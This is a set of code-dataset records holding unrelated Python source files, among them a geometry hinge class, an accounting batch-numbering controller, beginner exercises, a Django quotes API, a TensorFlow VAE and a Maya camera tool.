v1)])\n\n # produce new triangle tri from sides_ordered\n tri = Triangle(*(vector for _, vector in sides_ordered), [])\n\n sides_ordered = sorted([(self.id_edge_opp[1], v2 - v0),\n ((self.id_edge_opp[1] + 1) % 3, -v2),\n ((self.id_edge_opp[1] + 2) % 3, v0)])\n\n tri_opp = Triangle(*(vector for _, vector in sides_ordered), [])\n\n flipped_hinge = Hinge(tri, self.id_edge, tri_opp, self.id_edge_opp)\n\n for cartesian_coord, color in self.marked_cartesian_coords:\n flipped_hinge = flipped_hinge.mark_cartesian_coord(cartesian_coord - v0, color)\n\n return flipped_hinge\n\n @property\n def incircle_det(self):\n \"\"\"(p2 is inside/on/outside oriented circle 0-P0-P1) iff (det 0) \"\"\"\n return sage.all.matrix([[x, y, x ** 2 + y ** 2] for x, y in self.vectors]).determinant()\n\n @property\n @lru_cache(None)\n def _coefficients(self):\n (x0, y0), (x1, y1), (x2, y2) = self.vectors\n\n m02 = x1 * y2 - x2 * y1\n m12 = x0 * y2 - x2 * y0\n m22 = x0 * y1 - x1 * y0\n\n a = y0 ** 2 * m02 - y1 ** 2 * m12 + y2 ** 2 * m22\n b = 2 * (x0 * y0 * m02 - x1 * y1 * m12 + x2 * y2 * m22)\n c = x0 ** 2 * m02 - x1 ** 2 * m12 + x2 ** 2 * m22\n\n return a, b, c\n\n @property\n def halfplane(self):\n try:\n return HalfPlane.from_ineq(*self._coefficients)\n except ValueError:\n return None\n\n @property\n def triangle(self):\n return 
self.tri\n\n @property\n def triangle_opp(self):\n return self.tri_opp\n\n @property\n def ids_boundary(self):\n \"\"\"return the edge IDs of the boundary of the hinge\n starting in the NE and moving Clockwise\"\"\"\n\n label_tri, label_edge = self.id_edge\n label_tri_opp, label_edge_opp = self.id_edge_opp\n\n SE = (label_tri, (label_edge + 1) % 3)\n NE = (label_tri, (label_edge + 2) % 3)\n NW = (label_tri_opp, (label_edge_opp + 1) % 3)\n SW = (label_tri_opp, (label_edge_opp + 2) % 3)\n\n return NE, SE, SW, NW\n\n def plot(self):\n v0, v1, v2 = self.vectors\n vertices_t1 = [sage.all.zero_vector(2), v0, v1]\n vertices_t2 = [sage.all.zero_vector(2), v1, v2]\n return sage.all.polygon2d(vertices_t1, fill=False).plot() + sage.all.polygon2d(vertices_t2, fill=False).plot()\n","repo_name":"sfreedman67/samsurf","sub_path":"samsurf/hinge.py","file_name":"hinge.py","file_ext":"py","file_size_in_byte":7395,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"42557978253","text":"\"\"\"\nG/L Batch Numbering Management\n\"\"\"\n\n__author__ = 'Jaimy Azle'\n__version__ = '1.0'\n__copyright__ = 'Copyright (c) 2008 Jaimy Azle'\n\nfrom mvcsvc import *\nfrom elixir import *\nimport datetime as dt\nimport sqlalchemy as sa\nfrom validators import *\nfrom tbl import GLBCNO\n\nclass GLS070(MVCController):\n \"\"\"\n G/L Batch Numbering Management\n \"\"\"\n _description = 'G/L Batch Numbering Management'\n _supported_functions = (MVCFuncNew, MVCFuncOpen, MVCFuncShow, MVCFuncCopy, MVCFuncDelete)\n\n GLBCNOID = MVCField(MVCTypeList + MVCTypeField, String(3), label='Batch Code', charcase=ecUpperCase)\n GLBCNONM = MVCField(MVCTypeList + MVCTypeField, String(32), label='Description')\n GLBCMINO = MVCField(MVCTypeList + MVCTypeField, Integer(), label='Start From')\n GLBCMXNO = MVCField(MVCTypeList + MVCTypeField, Integer(), label='Max. No. Accepted')\n GLBCLSNO = MVCField(MVCTypeList + MVCTypeField, String(6), label='Last No. 
Used', enabled=False)\n\n def openView(self, mvcsession):\n q = GLBCNO.query\n q = q.order_by(sa.asc(GLBCNO.GLBCNOID))\n objs = q.all()\n\n for obj in objs:\n mvcsession.listDataset.Append()\n mvcsession.listDataset.SetFieldValue('GLBCNOID', obj.GLBCNOID)\n mvcsession.listDataset.SetFieldValue('GLBCNONM', obj.GLBCNONM)\n mvcsession.listDataset.SetFieldValue('GLBCMINO', obj.GLBCMINO)\n mvcsession.listDataset.SetFieldValue('GLBCMXNO', obj.GLBCMXNO)\n mvcsession.listDataset.SetFieldValue('GLBCLSNO', '%.6d' % obj.GLBCLSNO)\n mvcsession.listDataset.Post()\n return mvcsession\n\n def retrieveData(self, mvcsession):\n fields = mvcsession.listDataset.FieldsAsDict()\n if mvcsession.execType == MVCExecAppend:\n mvcsession.entryDataset.Append()\n mvcsession.entryDataset.SetFieldValue('GLBCMINO', 0)\n mvcsession.entryDataset.SetFieldValue('GLBCMXNO', 999999)\n mvcsession.entryDataset.SetFieldValue('GLBCLSNO', '%.6d' % 0)\n mvcsession.entryDataset.Post()\n\n if mvcsession.execType in (MVCExecShow, MVCExecEdit, MVCExecDelete, MVCExecCopy):\n q = GLBCNO.query\n q = q.filter_by(GLBCNOID = fields['GLBCNOID'])\n obj = q.first()\n\n if (mvcsession.execType == MVCExecCopy):\n mvcsession.entryDataset.CopyFromORM(\n 'GLBCNONM;GLBCMINO;GLBCMXNO',\n 'GLBCNONM;GLBCMINO;GLBCMXNO',\n obj)\n mvcsession.entryDataset.Edit()\n mvcsession.entryDataset.SetFieldValue('GLBCLSNO', '%.6d' % obj.GLBCLSNO)\n mvcsession.entryDataset.Post()\n\n else:\n mvcsession.entryDataset.CopyFromORM(\n 'GLBCNOID;GLBCNONM;GLBCMINO;GLBCMXNO',\n 'GLBCNOID;GLBCNONM;GLBCMINO;GLBCMXNO',\n obj)\n mvcsession.entryDataset.Edit()\n mvcsession.entryDataset.SetFieldValue('GLBCLSNO', '%.6d' % obj.GLBCLSNO)\n mvcsession.entryDataset.Post()\n\n if mvcsession.execType == MVCExecEdit:\n mvcsession.fieldDefs.GLBCNOID.enabled = False\n return mvcsession\n\n def postData(self, mvcsession):\n fields = mvcsession.entryDataset.FieldsAsDict()\n validators.NotEmpty(messages={'empty': 'Batch code must not empty'}).to_python(fields['GLBCNOID'])\n validators.NotEmpty(messages={'empty': 'Batch code name must not empty'}).to_python(fields['GLBCNONM'])\n if (fields['GLBCMINO'] is None) or (fields['GLBCMINO'] < 0):\n raise Exception('Minimum batch no must not empty or negative value, at least should be assign with 0')\n if (fields['GLBCMXNO'] is None) or (fields['GLBCMXNO'] > 999999):\n raise Exception('Minimum batch no must not empty or larger than 999999')\n\n q = GLBCNO.query\n q = q.filter_by(GLBCNOID = fields['GLBCNOID'])\n obj = q.first()\n\n td = dt.datetime.now()\n if (mvcsession.execType in (MVCExecAppend, MVCExecCopy)):\n if obj:\n raise Exception('Duplicate record found')\n\n rec = GLBCNO(\n GLBCNOID = fields['GLBCNOID'],\n GLBCNONM = fields['GLBCNONM'],\n GLBCMINO = fields['GLBCMINO'],\n GLBCMXNO = fields['GLBCMXNO'],\n GLBCLSNO = fields['GLBCMINO'],\n GLBCAUDT = td.date().tointeger(),\n GLBCAUTM = td.time().tointeger(),\n GLBCAUUS = mvcsession.cookies['user_name'].encode('utf8')\n )\n if not session.transaction_started():\n session.begin()\n try:\n session.save(rec)\n session.commit()\n except:\n session.rollback()\n session.expunge(rec)\n raise\n if (mvcsession.execType == MVCExecEdit):\n if not obj:\n raise Exception('Record could not be found')\n if fields['GLBCMINO'] > obj.GLBCLSNO:\n raise Exception('Starting Batch No must be smaller or equal with last batch no used')\n if fields['GLBCMXNO'] < obj.GLBCLSNO:\n raise Exception('Starting Batch No must be greater or equal with last batch no used')\n mvcsession.entryDataset.CopyIntoORM(\n 
'GLBCNONM;GLBCMINO;GLBCMXNO',\n 'GLBCNONM;GLBCMINO;GLBCMXNO',\n obj)\n obj.GLBCAUDT = td.date().tointeger()\n obj.GLBCAUTM = td.time().tointeger()\n obj.GLBCAUUS = mvcsession.cookies['user_name'].encode('utf8')\n if not session.transaction_started():\n session.begin()\n try:\n session.update(obj)\n session.commit()\n except:\n session.rollback()\n session.expunge(obj)\n raise\n\n if (mvcsession.execType == MVCExecDelete):\n if not obj:\n raise Exception('Record could not be found')\n if not session.transaction_started():\n session.begin()\n try:\n session.delete(obj)\n session.commit()\n except:\n session.rollback()\n raise\n return mvcsession\n\n\n\n","repo_name":"jazlee/csp-accounting","sub_path":"ecf/mvc/GLS070/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41881219992","text":"f = open(\"input.txt\", 'r').readlines()\n\nres = 0\n\nfor i in range(len(f)):\n row = list(map(int, list(f[i].strip())))\n\n for j, val in enumerate(row):\n if val == 9:\n continue\n\n if i > 0 and val >= int(f[i-1][j]):\n continue\n\n if i < len(f)-1 and val >= int(f[i+1][j]):\n continue\n\n if j > 0 and val >= row[j-1]:\n continue\n\n if j < len(row)-1 and val >= row[j+1]:\n continue\n\n res += val + 1\n\nprint(res)\n","repo_name":"Marina-Banov/Advent-of-Code","sub_path":"2021/09A.py","file_name":"09A.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26536265561","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"Handles basic import functions.\"\"\"\r\n\r\n# future imports\r\nfrom __future__ import absolute_import, division, print_function\r\n\r\n# locals\r\nimport glob\r\nfrom typing import List, Optional, Union\r\n\r\nfrom ._metapanda import MetaPanda\r\nfrom turbopanda._dependency import is_joblib_installed\r\nfrom .utils import instance_check, join\r\n\r\n\r\ndef read(\r\n filename: str, name: Optional[Union[str, List[str]]] = None, **kwargs\r\n) -> Union[MetaPanda, List[MetaPanda]]:\r\n \"\"\"Reads in a data source from file and creates a MetaPanda object from it.\r\n\r\n .. note:: multiple files are returned in 'alphabetical order'.\r\n\r\n\r\n\r\n Parameters\r\n ----------\r\n filename : str\r\n A relative/absolute link to the file, with extension provided.\r\n Accepted extensions: {'csv'', 'xls', 'xlsx', 'sql', 'json', 'pkl'}\r\n .json is a special use case and will use the MetaPanda format.\r\n .pkl is a pickable object which will use `joblib` to load in.\r\n name : str/list of str, optional\r\n Name to use for the MetaPanda, else `filename` is used.\r\n If `list`, this is sorted to alphabetically match `filename`.\r\n Not compatible with .pkl file types.\r\n kwargs : dict, optional\r\n Additional args to pass to pd.read_MetaPanda()\r\n\r\n Raises\r\n ------\r\n IOException\r\n If the no `filename` are selected, or `filename` does not exist\r\n ValueException\r\n If `filename` has incorrect file type ending\r\n\r\n Returns\r\n -------\r\n mdf : (list of) MetaPanda\r\n A MetaPanda object. Returns a list of MetaPanda if `filename` is glob-like and\r\n selects multiple files.\r\n \"\"\"\r\n # checks\r\n instance_check(filename, str)\r\n instance_check(name, (type(None), str, list, tuple))\r\n\r\n # use the glob package to allow for unix-like searching. 
Sorted alphabetically\r\n glob_name = sorted(glob.glob(filename))\r\n if len(glob_name) == 0:\r\n raise IOError(\"No files selected with filename {}\".format(filename))\r\n else:\r\n # maps the file type to a potential pandas function.\r\n pandas_types = (\"csv\", \"xls\", \"xlsx\", \"sql\")\r\n extra_types = (\"json\", \"pkl\")\r\n\r\n def ext(s):\r\n \"\"\"Extracts the file extension (in lower)\"\"\"\r\n return s.rsplit(\".\", 1)[-1].lower()\r\n\r\n def fetch_db(fl, n=None):\r\n \"\"\"Fetches the appropriate datafile set.\"\"\"\r\n if ext(fl) in pandas_types:\r\n return MetaPanda.from_pandas(fl, n, **kwargs)\r\n elif ext(fl) == \"json\":\r\n return MetaPanda.from_json(fl, name=n, **kwargs)\r\n elif ext(fl) == \"pkl\":\r\n # check if joblib is loaded\r\n if is_joblib_installed(raise_error=True):\r\n import joblib\r\n return joblib.load(fl)\r\n else:\r\n raise ValueError(\r\n \"file ending '.{}' not recognized, must end with {}\".format(\r\n fl, join(pandas_types, extra_types)\r\n )\r\n )\r\n\r\n if isinstance(name, (list, tuple)):\r\n ds = list(map(fetch_db, glob_name, sorted(name)))\r\n elif isinstance(name, str):\r\n ds = [fetch_db(f, name) for f in glob_name]\r\n else:\r\n ds = list(map(fetch_db, glob_name))\r\n # if we have more than one element, return the list, else just return ds\r\n return ds if len(ds) > 1 else ds[0]\r\n","repo_name":"gregparkes/turbopanda","sub_path":"turbopanda/_fileio.py","file_name":"_fileio.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14353860940","text":"from operator import ne\nimport os\nimport time\nimport random\nimport math\nfrom random import randint\n\n\ndef random_int_fill_list(size, limfrom, limto):\n new_list = []\n for i in range(size):\n new_list.append(randint(limfrom, limto))\n return new_list\n\n\ndef random_float_fill_list(size):\n new_list = []\n for i in range(size):\n new_list.append(round(random.random() * 10, 2))\n return new_list\n\ndef check_for_enter_error():\n while True:\n numb = input('Введите любое целое положительное число больше 0: ')\n if numb.isdigit():\n numb = int(numb)\n if numb == 0:\n os.system('cls' if os == 'nt' else 'clear')\n print('Число должно быть больше 0! Повторите ввод!')\n else: break\n else: \n os.system('cls' if os == 'nt' else 'clear')\n print('Ошибка ввода!') \n return int(numb)\n\ndef fib(n):\n if n in [1, 2]:\n return 1\n elif n == -1:\n return 1\n elif n == -2:\n return -1\n elif n > 0:\n return fib(n - 1) + fib(n - 2)\n elif n < -2:\n return fib(n + 1) + fib(n + 2)\n elif n == 0:\n return 0\n\ndef zadacha_19(): # 19. Реализуйте алгоритм задания случайных чисел без использования\n # встроенного генератора псевдослучайных чисел.\n os.system('sls' if os == 'nt' else 'clear')\n # n = 10\n # a = 1234\n # c = 89567\n # m = 45\n # my_list = []\n # for i in range(n):\n # my_list.append(round(((a ** i - 1) / (a - 1) * c) % m))\n # print(my_list)\n\n # my_list = ([int(str(time.time())[-1]) for i in range(10)])\n # print(my_list)\n\n seconds = time.time()\n rand = int(100*(seconds % 1))\n print(rand)\n\n\ndef zadacha_20(): # 20. Задайте список. 
Напишите программу, которая определит,\n # присутствует ли в заданном списке строк некое число.\n os.system('sls' if os == 'nt' else 'clear')\n string_1 = ['sdf34sdf', 'lkj324o', 'poics99l', '93n1', 'mklja56a8']\n print(string_1)\n numb = int(input('Введите искомое число: '))\n count = 0\n for i in string_1:\n # if i.find(str(numb)) != -1:\n # print(f'{i} содержит {numb}')\n if str(numb) in i:\n print(f'{i} содержит {numb}')\n count += 1\n if count == 0:\n print(f'{numb} не содержится в списке')\n\n\ndef zadacha_21(): # 21. Напишите программу, которая определит позицию второго вхождения\n # строки в списке либо сообщит, что её нет.\n os.system('sls' if os == 'nt' else 'clear')\n list_1 = [\"qwe\", \"asd\", \"zxc\", \"qwe\", \"ertqwe\"]\n my_str = input('Введите строку: ')\n count = 0\n v_index = 0\n for i in range(len(list_1)):\n if my_str == list_1[i]:\n count += 1\n if count == 2:\n v_index = i\n break\n if count == 0:\n print(f'У {my_str} нет вхождения в {list_1}')\n elif count < 2:\n print(f'У {my_str} нет второго вхождения в {list_1}')\n elif count == 2:\n print(f'У {my_str} имеется второе вхождения в {list_1} с индексом {v_index}')\n\n\ndef zadacha_22(): # 22. Задайте список из нескольких чисел. Напишите программу, которая найдёт\n # сумму элементов списка, стоящих на нечётной позиции.\n os.system('sls' if os == 'nt' else 'clear')\n size = 10\n rand_from = -44\n rand_to = 44\n my_list = random_int_fill_list(size, rand_from, rand_to)\n sum_of_odd_ind_elms = 0\n for i in range(1, len(my_list), 2):\n sum_of_odd_ind_elms += my_list[i]\n print(\n f'Сумма элементов списка {my_list} с нечетными индексами = {sum_of_odd_ind_elms}')\n\n\ndef zadacha_23(): # 23. Напишите программу, которая найдёт произведение пар чисел списка. Парой\n # считаем первый и последний элемент, второй и предпоследний и т.д.\n os.system('sls' if os == 'nt' else 'clear')\n size = int(input('Введите количество элементов списка: '))\n rand_from = 0\n rand_to = 20\n my_list = random_int_fill_list(size, rand_from, rand_to)\n pairs_mult = 1\n res = []\n for i in range(math.ceil(size / 2)):\n pairs_mult = my_list[i] * my_list[size - 1 - i]\n res.append(pairs_mult)\n print(\n f'Произведения пар элементов списка {my_list} \"снаружи внутрь\" = {res}')\n print()\n\n\ndef zadacha_24(): # 24. Задайте список из вещественных чисел. Напишите программу, которая найдёт\n # разницу между максимальным и минимальным значением дробной части элементов.\n os.system('cls' if os == 'nt' else 'clear')\n size = 10\n my_list = random_float_fill_list(size)\n print(my_list)\n new_lst = ([round(i % 1, 2) for i in my_list])\n print(new_lst)\n res = max(new_lst) - min(new_lst)\n print(res)\n # ИЛИ:\n # print(my_list)\n # min_val = 99\n # max_val = 0\n # for i in range(size):\n # if my_list[i] % 1 < min_val and my_list[i] % 1 != 0:\n # min_val = round(my_list[i] % 1, 2)\n # elif my_list[i] % 1 > max_val:\n # max_val = round(my_list[i] % 1, 2)\n \n # print(f'Максимальное значение дробной части элементов списка: {max_val}')\n # print(f'Минимальное значение дробной части элементов списка: {min_val}')\n # print(f'Разница между максимальным и минимальным значением дробной части элементов составляет {round(max_val - min_val, 2)}')\n\ndef zadacha_25(): #25. 
Напишите программу, которая будет преобразовывать \n # десятичное число в двоичное.\n os.system('cls' if os == 'nt' else 'clear')\n sys_sch = 2\n numb = check_for_enter_error()\n # while True:\n # numb = input('Введите любое целое положительное число больше 0: ')\n # if numb.isdigit():\n # numb = int(numb)\n # if numb == 0:\n # os.system('cls' if os == 'nt' else 'clear')\n # print('Число должно быть больше 0! Повторите ввод!')\n # else: break\n # else: \n # os.system('cls' if os == 'nt' else 'clear')\n # print('Ошибка ввода!') \n os.system('cls' if os == 'nt' else 'clear')\n numb_res = numb\n my_list = []\n while int(numb_res) > 0:\n my_list.insert(0, int(numb_res % sys_sch))\n numb_res /= sys_sch\n my_str: str = \"\"\n for i in my_list:\n my_str += str(i)\n my_str = int(my_str)\n print(f'{numb} в {sys_sch}-й системе счисления: {my_str}')\n \ndef zadacha_26(): # 26. Задайте число. Составьте список чисел Фибоначчи, \n # в том числе для отрицательных индексов.\n os.system('cls' if os == 'nt' else 'clear')\n numb = check_for_enter_error()\n my_list = []\n for i in range(-numb, numb + 1):\n my_list.append(fib(i))\n print(my_list)\n \n\n \n \n \n\n# zadacha_19()\n# zadacha_20()\n# zadacha_21()\n# zadacha_22()\n# zadacha_23()\nzadacha_24()\n# zadacha_25()\n# zadacha_26()","repo_name":"Marphiy/PY_Sem3","sub_path":"Sem3.py","file_name":"Sem3.py","file_ext":"py","file_size_in_byte":8082,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10848712800","text":"from quotes.models import Quote\nfrom quotes.serializers import QuoteSerializer\n\nfrom rest_framework import viewsets\nfrom rest_framework.response import Response\n\n\nclass QuoteViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint to view and edit quotes.\n \"\"\"\n queryset = Quote.all_active()\n serializer_class = QuoteSerializer\n\n def list(self, request, *args, **kwargs):\n response = super().list(request, *args, **kwargs)\n response.data = {\"results\": response.data}\n\n return response\n\n def vote(f):\n def vote_internal(self, request, pk=None):\n quote = self.get_object()\n f(quote)\n quote.save()\n\n score = quote.score_up - quote.score_down\n return Response({\n 'status': 'OK',\n 'score': score\n })\n\n return vote_internal\n\n# @action(permission_classes=(AllowAny,))\n# @vote\n# def upvote(quote):\n# quote.score_up += 1\n#\n# @action(permission_classes=(AllowAny,))\n# @vote\n# def downvote(self, request, pk=None):\n# quote.score_down += 1\n","repo_name":"tari/decbot_web","sub_path":"quotes/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6966356920","text":"# -*- coding: utf-8 -*-\n\n# for mounting with goggle drives\n# import sys\n# sys.path.append('/content/drive/MyDrive/tesorflow2.0 연습/VAE')\n# print(sys.path)\n\nimport load_data\nimport tensorflow as tf\nimport numpy as np\n\nfrom tensorflow.keras import Model, layers\nfrom tensorflow.keras.layers import Conv2D, Dense, MaxPool2D, Flatten, Conv2DTranspose, Reshape, Input\n\n\ndef sampling(mean, sigma):\n shape = np.shape(mean.numpy())\n return tf.random.normal(shape, mean, sigma, dtype=tf.float32)\n\nclass Encoder(layers.Layer):\n def __init__(self,\n latent_dim=16,\n intermediate_dim=64,\n name='encoder'\n ):\n super(Encoder, self).__init__(name=name)\n \n self.h0 = Dense(intermediate_dim, activation='relu')\n self.h1 = Dense(intermediate_dim, activation='relu')\n self.mean = 
Dense(latent_dim)\n self.sigma = Dense(latent_dim)\n\n def call(self, inputs):\n h0 = self.h0(inputs)\n h1 = self.h1(h0)\n mean = self.mean(h1)\n sigma = self.sigma(h1)\n z = sampling(mean, sigma)\n return mean, sigma, z\n\nclass Decoder(layers.Layer):\n def __init__(\n self,\n intermediate_dim = 64,\n img_dim=784,\n name='decoder'\n ):\n super(Decoder, self).__init__(name=name)\n self.h0 = Dense(intermediate_dim, activation='relu')\n self.h1 = Dense(intermediate_dim, activation='relu')\n self.reconstruct = Dense(img_dim, activation='sigmoid')\n\n def call(self, inputs):\n h0 = self.h0(inputs)\n h1 = self.h1(h0)\n reconstruct = self.reconstruct(h1)\n return reconstruct\n\nclass VariationalAutoencoder(layers.Layer):\n def __init__(self,\n img_dim,\n intermediate_dim,\n latent_dim,\n name='vae'\n ):\n super(VariationalAutoencoder, self).__init__(name=name)\n self.encoder=Encoder(latent_dim=latent_dim,\n intermediate_dim=intermediate_dim,\n )\n self.decoder=Decoder(intermediate_dim=intermediate_dim,\n img_dim=img_dim)\n \n \n def call(self, inputs):\n z_mean, z_log_var, z = self.encoder(inputs)\n reconstructed = self.decoder(z)\n kl_loss = - 0.5 * tf.reduce_mean(\n z_log_var - tf.square(z_mean) - tf.exp(z_log_var) + 1)\n self.add_loss(kl_loss)\n return reconstructed\n\n\n\n","repo_name":"DaeseungLee/VAE-Tensorflow2.0","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"14859206898","text":"from os.path import abspath, dirname\nfrom sys import stderr\n\nfrom PySide2.QtCore import QEvent, Qt\nfrom PySide2.QtUiTools import QUiLoader\nfrom PySide2.QtWidgets import QMainWindow, QWidget, QComboBox, QStyledItemDelegate\nfrom maya import cmds as maya_cmds\nfrom maya.OpenMayaUI import MQtUtil\nfrom maya.api import OpenMaya, OpenMayaUI\nfrom shiboken2 import wrapInstance\n\nclass ToolSeq_Cameras(QWidget):\n\n\tuserScriptDir = dirname(abspath(__file__)) + '/'\n\n\tqUiLoader = QUiLoader()\n\tqUiLoader.setWorkingDirectory(userScriptDir)\n\n\twindowMain = wrapInstance(int(MQtUtil.mainWindow()), QMainWindow)\n\n\tdef __init__(self):\n\t\tsuper(ToolSeq_Cameras, self).__init__(ToolSeq_Cameras.windowMain)\n\n\t\tself.window = ToolSeq_Cameras.qUiLoader.load(ToolSeq_Cameras.userScriptDir + 'ui/ToolSeq_Cameras.ui', self)\n\t\tself.window.setWindowFlags(self.window.windowFlags() & ~Qt.WindowMinMaxButtonsHint)\n\t\tself.window.setAttribute(Qt.WA_DeleteOnClose)\n\t\tfor qComboBox in self.window.findChildren(QComboBox):\n\t\t\tqComboBox.setItemDelegate(QStyledItemDelegate(qComboBox))\n\t\twith open(ToolSeq_Cameras.userScriptDir + 'ToolSeq.qss', 'r') as fileStyleSheet:\n\t\t\tself.window.setStyleSheet(fileStyleSheet.read())\n\n\t\tself.window.Button_P.installEventFilter(self)\n\t\tself.window.Button_TB.installEventFilter(self)\n\t\tself.window.Button_FB.installEventFilter(self)\n\t\tself.window.Button_LR.installEventFilter(self)\n\n\t\tmaya_cmds.undoInfo(stateWithoutFlush=False)\n\t\ttry:\n\t\t\tself.Activity_CreateAll()\n\t\texcept Exception as e:\n\t\t\tprint(str(e), file=stderr)\n\t\tmaya_cmds.undoInfo(stateWithoutFlush=True)\n\n\t\tself.window.show()\n\n\tdef eventFilter(self, source, event):\n\t\tsourceObjectName = source.objectName()\n\t\teventType = event.type()\n\t\tif sourceObjectName == 'Button_P':\n\t\t\tif eventType == QEvent.MouseButtonRelease:\n\t\t\t\teventButton = event.button()\n\t\t\t\tif eventButton == 
Qt.LeftButton:\n\t\t\t\t\tself.Action_Camera('Camera_Perspective')\n\t\t\t\telif eventButton == Qt.RightButton:\n\t\t\t\t\tself.Action_Camera('Camera_Perspective')\n\t\t\t\telif eventButton == Qt.MiddleButton:\n\t\t\t\t\tToolSeq_Cameras.Action_Ortographic()\n\t\telif sourceObjectName == 'Button_TB':\n\t\t\tif eventType == QEvent.MouseButtonRelease:\n\t\t\t\teventButton = event.button()\n\t\t\t\tif eventButton == Qt.LeftButton:\n\t\t\t\t\tself.Action_Camera('Camera_Top')\n\t\t\t\telif eventButton == Qt.RightButton:\n\t\t\t\t\tself.Action_Camera('Camera_Bottom')\n\t\t\t\telif eventButton == Qt.MiddleButton:\n\t\t\t\t\tToolSeq_Cameras.Action_Ortographic()\n\t\telif sourceObjectName == 'Button_FB':\n\t\t\tif eventType == QEvent.MouseButtonRelease:\n\t\t\t\teventButton = event.button()\n\t\t\t\tif eventButton == Qt.LeftButton:\n\t\t\t\t\tself.Action_Camera('Camera_Front')\n\t\t\t\telif eventButton == Qt.RightButton:\n\t\t\t\t\tself.Action_Camera('Camera_Back')\n\t\t\t\telif eventButton == Qt.MiddleButton:\n\t\t\t\t\tToolSeq_Cameras.Action_Ortographic()\n\t\telif sourceObjectName == 'Button_LR':\n\t\t\tif eventType == QEvent.MouseButtonRelease:\n\t\t\t\teventButton = event.button()\n\t\t\t\tif eventButton == Qt.LeftButton:\n\t\t\t\t\tself.Action_Camera('Camera_Left')\n\t\t\t\telif eventButton == Qt.RightButton:\n\t\t\t\t\tself.Action_Camera('Camera_Right')\n\t\t\t\telif eventButton == Qt.MiddleButton:\n\t\t\t\t\tToolSeq_Cameras.Action_Ortographic()\n\t\treturn False\n\n\t@staticmethod\n\tdef Activity_CreateAll():\n\t\tselection = maya_cmds.ls(selection=True)\n\n\t\tif not maya_cmds.objExists('ToolSeq_Cameras'):\n\t\t\tmaya_cmds.group(empty=True, name='ToolSeq_Cameras')\n\t\t\tmaya_cmds.hide('ToolSeq_Cameras')\n\t\t\tmaya_cmds.reorder('ToolSeq_Cameras', front=True)\n\t\tToolSeq_Cameras.Activity_CreateCamera('Camera_Perspective', 'persp')\n\t\tToolSeq_Cameras.Activity_CreateCamera('Camera_Top', 'top')\n\t\tToolSeq_Cameras.Activity_CreateCamera('Camera_Bottom', 'bottom')\n\t\tToolSeq_Cameras.Activity_CreateCamera('Camera_Front', 'front')\n\t\tToolSeq_Cameras.Activity_CreateCamera('Camera_Back', 'back')\n\t\tToolSeq_Cameras.Activity_CreateCamera('Camera_Left', 'left')\n\t\tToolSeq_Cameras.Activity_CreateCamera('Camera_Right', 'right')\n\n\t\tmaya_cmds.select(selection)\n\n\t@staticmethod\n\tdef Activity_CreateCamera(cameraName, cameraDirection):\n\t\tif maya_cmds.objExists(cameraName):\n\t\t\treturn\n\n\t\tif cameraDirection in ['persp', 'top', 'front', 'left']:\n\t\t\tmaya_cmds.duplicate(cameraDirection.replace('left', 'side'), name=cameraName)\n\t\telif cameraDirection == 'bottom':\n\t\t\tmaya_cmds.duplicate('top', name=cameraName)\n\t\t\tmaya_cmds.setAttr(cameraName + '.rotateX', 90)\n\t\telif cameraDirection == 'back':\n\t\t\tmaya_cmds.duplicate('front', name=cameraName)\n\t\t\tmaya_cmds.setAttr(cameraName + '.rotateY', 180)\n\t\telif cameraDirection == 'right':\n\t\t\tmaya_cmds.duplicate('side', name=cameraName)\n\t\t\tmaya_cmds.setAttr(cameraName + '.rotateY', -90)\n\t\tmaya_cmds.hide(cameraName)\n\t\tmaya_cmds.parent(cameraName, 'ToolSeq_Cameras')\n\t\tmaya_cmds.reorder(cameraName, back=True)\n\n\t@staticmethod\n\tdef Action_DeleteAll():\n\t\tmaya_cmds.undoInfo(stateWithoutFlush=False)\n\t\ttry:\n\t\t\tmaya_cmds.lookThru('modelPanel1', 'top')\n\t\t\tmaya_cmds.lookThru('modelPanel2', 'side')\n\t\t\tmaya_cmds.lookThru('modelPanel3', 'front')\n\t\t\tmaya_cmds.lookThru('modelPanel4', 'persp')\n\t\t\tmaya_cmds.delete('Camera_Perspective', 'Camera_Top', 'Camera_Bottom', 'Camera_Front', 
'Camera_Back', 'Camera_Left', 'Camera_Right', 'ToolSeq_Cameras')\n\t\texcept Exception as e:\n\t\t\tprint(str(e), file=stderr)\n\t\tmaya_cmds.undoInfo(stateWithoutFlush=True)\n\n\tdef Action_Camera(self, cameraName):\n\t\tmaya_cmds.undoInfo(stateWithoutFlush=False)\n\t\ttry:\n\t\t\tif not maya_cmds.objExists(cameraName):\n\t\t\t\tself.Activity_CreateAll()\n\t\t\tmaya_cmds.lookThru(cameraName)\n\t\texcept Exception as e:\n\t\t\tprint(str(e), file=stderr)\n\t\tmaya_cmds.undoInfo(stateWithoutFlush=True)\n\n\t@staticmethod\n\tdef Action_Ortographic():\n\t\tmaya_cmds.undoInfo(stateWithoutFlush=False)\n\t\ttry:\n\t\t\torthographic = OpenMaya.MFnDependencyNode(OpenMayaUI.M3dView.active3dView().getCamera().node()).findPlug('orthographic', True)\n\t\t\torthographic.setBool(not orthographic.asBool())\n\t\texcept Exception as e:\n\t\t\tprint(str(e), file=stderr)\n\t\tmaya_cmds.undoInfo(stateWithoutFlush=True)","repo_name":"canerozdemircgi/ToolSeq","sub_path":"Contents/scripts/ToolSeq_Cameras.py","file_name":"ToolSeq_Cameras.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} 